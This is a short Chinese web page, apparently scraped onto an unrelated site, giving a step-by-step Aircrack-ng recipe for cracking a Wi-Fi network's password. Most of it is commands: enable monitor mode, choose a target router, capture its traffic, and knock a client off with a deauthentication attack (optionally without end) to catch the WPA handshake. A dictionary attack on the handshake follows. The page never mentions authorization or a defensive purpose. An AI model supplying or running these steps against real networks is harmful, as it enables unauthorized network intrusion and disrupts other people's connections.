Aircrack

您所在的位置:网站首页 kali 跑字典 Aircrack

Aircrack

2024-01-31 03:16| 来源: 网络整理| 查看: 265

成功开启monitor模式后,开始抓包 ps:这里写的是aircrack-ng驱动的网卡的抓包方法,madwifi-ng驱动的网卡的抓包方法需要稍做改动,参考官方文章的Aircrack-ng suite 首先kill掉影响监听的进程:

airmon-ng check kill

开启监听模式:

airodump-ng wlan0mon

根据ESSID判断你要抓包的路由,记录这个路由的BSSID和CH后,开始抓包:

airodump-ng -c 你记录的CH --bssid 你记录的BSSID -w 握手包放置路径 wlan0mon

抓包时耐心等待最下方的列表出现数据,出现数据之后记录STATION,如果等待的时间足够长,还能出现多个STATION。得到STATION之后开始对路由发起deauth攻击(50代表50次攻击,如果改成0就是一直攻击):

aireplay-ng -0 50 -a 你记录的BSSID -c 你记录的STATION wlan0mon

攻击结束后,查看有没有抓到可用的握手包:

aircrack-ng 握手包的位置

如果抓到包了,就开始跑字典:

aircrack-ng -w 字典的位置 握手包的位置

当然,你也可以把握手包拿到别的软件或者系统上跑字典,转移握手包的方法很多,可以直接用u盘,也可以安装VMware Tools使用共享文件夹,还可以使用虚拟机桥接或着NAT模式,教程网上都有,可以自己搜 推荐的跑字典软件:EWSA



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3